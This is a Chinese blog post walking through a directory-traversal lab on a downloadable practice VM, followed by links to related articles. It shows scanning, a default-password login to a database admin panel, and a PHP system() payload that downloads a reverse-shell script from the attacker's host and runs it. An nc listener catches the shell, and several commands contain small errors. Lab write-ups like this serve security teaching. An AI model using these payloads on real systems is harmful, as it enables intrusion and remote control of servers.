目录遍历漏洞

最新推荐文章于 2024-03-10 12:30:00 发布
最新推荐文章于 2024-03-10 12:30:00 发布
阅读量8.1k 收藏 43
点赞数 9
分类专栏: Web漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/112193859
版权

在开始之前,先介绍一下目录遍历漏洞的原理
目录遍历漏洞原理比较简单,就是程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…/,也可是…/的ASCII编码或者是unicode编码等。

靶机

链接:https://pan.baidu.com/s/1rkcs2rhBPch3Q5beSZJ4Rg
提取码:20td

漏洞复现过程

  1. 使用netdiscover发现存活主机
netdiscover -i eth0

在这里插入图片描述

  1. 使用nmap进行服务探测
nmap -sV 172.20.10.9

在这里插入图片描述

  1. 使用nmap时并没有发现有明显的可利用漏洞,因此使用OWSAP_ZAP进行web漏洞扫描
  • 使用OWSAP_ZAP时发现目标网站存在目录遍历漏洞
  • 访问目标的URL地址,得到以下信息
    在这里插入图片描述
    在这里插入图片描述
  • 不难发现,页面返回的是/etc/passwd的秘密文件信息
  1. 使用dirb进行目录挖掘
dirb http://172.20.10.9
  • 发现了dbadmin后台数据库,尝试使用admin密码登录成功
  • 若在实战中尝试失败,可以利用sql-post注入等使用sqlmap进行密码爆破
    在这里插入图片描述
    在这里插入图片描述
  1. 进入数据库后,点击创建一个shell.php数据库
    在这里插入图片描述
    在这里插入图片描述
  2. 生成一个php的shellcode代码,用于反弹网站的webshell
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/Desktop/shell.php
  • 编辑shellcode.php文件,IP地址设置为本机ip,端口为自己想要侦听的端口
    在这里插入图片描述
  1. 完善数据库信息,在Default Value值出填入以下代码用于执行shellcode
    在这里插入图片描述
  • 要在Default Value填入的字段
<?php system("cd /tmp;wget http://172.20.10.7:8000/shellcode.php;chmod +x shell.php;php shell.php);"?>
  1. 使用python快速搭建一个http的web服务,默认开启的是8000端口
python -m "SimpleHTTPServer"
  1. 使用nc命令监听4444端口
nc -nlvp 4444
  1. 将最后的etc%2Fpasswd字段值替换为/usr/databases/shell.php即可反弹webshell
    在这里插入图片描述
  • 反弹成功
    在这里插入图片描述
  1. 使用python命令优化终端
python -m "import pty; pty.spawn('/bin/bash')"
  • 成功获取www-data用户权限
    在这里插入图片描述
平凡的学者
关注
  • 9
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
BitTraversal:Burpsuite 插件检测目录遍历漏洞
05-29
该插件使用两种主要技术来识别目录遍历漏洞 检测方法 静电检测 动态检测 i) 使用在中指定的预定义有效,这些将在运行时从 GitHub 获取并与匹配 ii) 仍在开发中。 目的是检测与/static/css/main.css/和/static/../...
serv-u越权遍历.doc
06-25
serv-u越权遍历方法,代码.18. Affected: 19. 220 Serv-U FTP Server v7.3 ready... 20. 220 Serv-U FTP Server v7.1 ready... 21. 220 Serv-U FTP Server v6.4 ready... 22. 220 Serv-U FTP Server v8.2 ready... 23. 220 Serv-U FTP Server v10.5 ready... 24.
【Web漏洞探索】目录遍历漏洞
mr__sheng的博客
09-08 442
由chroot创造出的那个根目录,叫做“chroot监狱”(指通过chroot机制来更改某个进程所能看到的根目录,即将某进程限制在指定目录中),保证该进程只能对该目录及其子目录的文件有所动作,从而保证整个服务器的安全。对用户传过来的文件名参数进行统一编码,将所有字符转换成url编码,这样服务器不会解析成../,对包含恶意字符或者空字符的参数进行拒绝。参数file的数据采用Base64加密,而攻击中只需要将数据进行相应的解密即可入侵,采用一些常见、规律性的加密方式也是不安全的。
目录遍历漏洞原理、解决方案
最新发布
qq_44005305的博客
03-10 4296
目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。
Java代码审计之目录遍历漏洞详解
m0_71745754的博客
01-13 5336
通过用户输入,后端接收到参数直接拼接到指定路径下读取用户的文件名,看似正常,但是用户输入的参数不可控制,黑客将非法的特殊字符作为文件名的一部分,操作到其他路径下,甚至是跳转到服务器敏感目录,读取敏感的配置文件,例如服务器的密码文件,程序数据库,redis等核心配置文件,因此具有一定的风险;
目录遍历.
热门推荐
94小菜
01-10 1万+
目录简介:漏洞挖掘:绕过:修复建议:案例附件:敏感文件 简介: 目录遍历(也称为文件路径遍历)是一种 Web 安全漏洞,允许攻击者读取运行应用程序的服务器上的任意文件。 危害: 1、读取的文件可能包括应用程序代码和数据、后端系统的凭据以及敏感的操作系统文件等。 2、在某些情况下,攻击者可能能够写入服务器上的任意文件,从而允许他们修改应用程序数据或行为,并最终完全控制服务器 漏洞详情: 以pikachu为例,进行演示 通过构造路径,查询出1.txt的内容:…/…/…/1.txt 原理是酱紫的: URL路径
信息安全技术:目录遍历漏洞利用.pptx
11-01
《信息安全技术:目录遍历漏洞利用》 在信息安全领域,目录遍历漏洞是一种常见的安全问题,它涉及到Web应用和Web服务器的安全性。攻击者利用这种漏洞可以访问到本不应公开的系统文件,甚至可能控制服务器执行恶意...
信息安全技术:目录遍历漏洞防御.pptx
11-01
目录遍历漏洞是网络安全领域的一个重要问题,它允许攻击者通过构造特定的URL,绕过正常的访问控制,访问到服务器上的非预期目录,甚至包括敏感文件。这种漏洞通常发生在Web应用程序中,当系统未能正确验证和处理用户...
信息安全技术:目录遍历漏洞的绕过.pptx
11-01
【信息安全技术:目录遍历漏洞的绕过】 在信息安全领域,目录遍历漏洞是一种常见的安全威胁,它允许攻击者访问本应受到限制的系统文件或目录。这些漏洞通常出现在Web应用程序中,允许用户通过特定的输入来遍历文件...
Zip文件目录遍历漏洞demo
02-28
Zip文件目录遍历漏洞的测试小demo,可加深对漏洞本身的理解.
信息安全技术:目录遍历漏洞概念.pptx
11-01
信息安全技术基础
dirscalate:Dirscalate帮助将目录遍历漏洞升级为根访问(希望如此)
04-28
Dirscalate帮助将目录遍历漏洞升级为根访问(希望如此) 要求 机械化 用法 dirscalate.py [-h] --link LINK [--histfile HISTFILE] [--token令牌] [--logfile LOGFILE] [--depth DEPTH] [--type TYPE] 利用目录遍历...
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、...
目录穿越/遍历漏洞及对其防御方法的绕过
2301_77004573的博客
04-30 4018
目录穿越(目录遍历)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。目录穿越不仅可以访问服务器中的任何目录,还可以访问服务器中任何文件的内容。例如,攻击者通过浏览器访问…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd(此处较多…/),就可以读取Linux服务器根目录下的etc目录下的passwd文件的内容。
遍历目录的三种方法
沉觞的博客
03-26 2217
1 #使用栈遍历目录 #根节点 path = r"E:\python1901\chengxu" #根节点先入栈 #判断栈是否为空 #出栈处理 #列举节点下所有的文件 #判断文件是否为目录, #若为目录,入栈处理 #若不为目录,直接打印 import os path = r"E:\python1901\chengxu" def stackgetdir(path): ...
gitlab目录遍历漏洞
06-01
GitLab目录遍历漏洞是指攻击者可以通过利用GitLab应用程序的漏洞,实现对Git仓库中的文件进行未授权访问和下载,进而获取敏感信息的漏洞。这种漏洞通常是由于GitLab应用程序没有正确的对用户输入进行过滤和验证,导致攻击者可以通过构造特定的请求,绕过GitLab应用程序的访问控制机制,访问和下载Git仓库中的文件。 攻击者可以利用目录遍历漏洞获取Git仓库中的敏感文件,包括代码、配置文件、用户凭证等,从而对系统进行进一步的攻击。为了防止目录遍历漏洞的攻击,GitLab官方建议用户采取以下措施: 1. 及时更新GitLab应用程序版本,确保已经修复了已知的漏洞。 2. 对GitLab应用程序进行安全审计,及时发现和修复可能存在的漏洞。 3. 启用GitLab的访问控制功能,限制用户对Git仓库中的文件的访问权限。 4. 对Git仓库中的敏感文件进行加密或者其他保护措施,确保文件不会被未授权访问。 5. 对GitLab应用程序进行安全加固,如:关闭不必要的服务、减少系统漏洞等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值